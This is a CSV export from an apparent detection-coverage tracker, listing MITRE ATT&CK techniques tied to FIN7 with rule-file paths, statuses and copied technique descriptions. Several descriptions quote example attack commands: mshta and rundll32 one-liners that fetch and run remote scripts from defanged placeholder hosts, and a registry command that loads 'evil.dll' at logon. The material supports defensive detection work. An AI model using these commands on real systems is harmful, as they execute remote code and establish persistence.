Technique ID,Name,Tactics,Status,Linked Rule,Liczba wykryć,Author,Description,MITRE Link,ChangeHistory
T1210,Exploitation of Remote Services,Lateral-Movement,Pending,alerts\FIN7\T1210_Exploitation_of_Remote_Services.html,,APT Matrix Generator,"Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.  An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.  There are several well-known vulnerabilities that exist in common services such as SMB(Citation: CIS Multiple SMB Vulnerabilities) and RDP(Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL(Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Additionally, there have been a number of vulnerabilities in VMware vCenter installations, which may enable threat actors to move laterally from the compromised vCenter server to virtual machines or even to ESXi hypervisors.(Citation: Broadcom VMSA-2024-0019)  Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.",https://attack.mitre.org/techniques/T1210/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1218.005,Mshta,Defense-Evasion,Pending,alerts\FIN7\T1218.005_Mshta.html,,APT Matrix Generator,"Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)   Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)  Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute(""GetObject(""""script:https[:]//webserver/payload[.]sct"""")""))</code>  They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>  Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",https://attack.mitre.org/techniques/T1218/005/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1218.011,Rundll32,Defense-Evasion,Pending,alerts\FIN7\T1218.011_Rundll32.html,,APT Matrix Generator,"Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).  Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.  Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https[:]//www[.]example[.]com/malicious.sct"")""</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)  Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).  Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) ",https://attack.mitre.org/techniques/T1218/011/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1219,Remote Access Tools,Command-And-Control,Tested,alerts\FIN7\T1219_Remote_Access_Tools.html,,APT Matrix Generator,"An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session between two trusted hosts through a graphical interface, a command line interaction, a protocol tunnel via development or management software, or hardware-level access such as KVM (Keyboard, Video, Mouse) over IP solutions. Desktop support software (usually graphical interface) and remote management software (typically command line interface) allow a user to control a computer remotely as if they are a local user inheriting the user or software permissions. This software is commonly used for troubleshooting, software installation, and system management.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.  Remote access tools may be installed and used post-compromise as an alternate communications channel for redundant access or to establish an interactive remote desktop session with the target system. It may also be used as a malware component to establish a reverse connection or back-connect to a service or adversary-controlled system.  Installation of many remote access tools may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)",https://attack.mitre.org/techniques/T1219/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1486,Data Encrypted for Impact,Impact,Pending,alerts\FIN7\T1486_Data_Encrypted_for_Impact.html,,APT Matrix Generator,"Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)  In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) Adversaries may also encrypt virtual machines hosted on ESXi or other hypervisors.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)   To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers or ESXi server login messages, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as ""print bombing"").(Citation: NHS Digital Egregor Nov 2020)(Citation: Varonis)  In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) For example, in AWS environments, adversaries may leverage services such as AWS’s Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data.(Citation: Halcyon AWS Ransomware 2025)",https://attack.mitre.org/techniques/T1486/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1497.002,User Activity Based Checks,"Defense-Evasion, Discovery",Pending,alerts\FIN7\T1497.002_User_Activity_Based_Checks.html,,APT Matrix Generator,"Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)  Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ",https://attack.mitre.org/techniques/T1497/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1543.003,Windows Service,"Persistence, Privilege-Escalation",Pending,alerts\FIN7\T1543.003_Windows_Service.html,,APT Matrix Generator,"Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.  Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.   Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as ""Bring Your Own Vulnerable Driver"" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)  Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).  To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)",https://attack.mitre.org/techniques/T1543/003/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1546.011,Application Shimming,"Persistence, Privilege-Escalation",Pending,alerts\FIN7\T1546.011_Application_Shimming.html,,APT Matrix Generator,"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)  Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.   A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:  * <code>%WINDIR%\AppPatch\sysmain.sdb</code> and * <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>  Custom databases are stored in:  * <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code> and * <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>  To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).  Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.",https://attack.mitre.org/techniques/T1546/011/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1547.001,Registry Run Keys / Startup Folder,"Persistence, Privilege-Escalation",Pending,alerts\FIN7\T1547.001_Registry_Run_Keys__Startup_Folder.html,,APT Matrix Generator,"Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the ""run keys"" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.  The following run keys are created by default on Windows systems:  * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>  Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a ""Depend"" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d ""C:\temp\evil[.]dll""</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)  Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.  The following Registry keys can be used to set startup folder items for persistence:  * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>  The following Registry keys can control automatic startup of services during boot:  * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>  Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:  * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>  Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.  By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.  Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",https://attack.mitre.org/techniques/T1547/001/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1553.002,Code Signing,Defense-Evasion,Pending,alerts\FIN7\T1553.002_Code_Signing.html,,APT Matrix Generator,"Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.  Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)  Code signing certificates may be used to bypass security policies that require signed code to execute on a system. ",https://attack.mitre.org/techniques/T1553/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
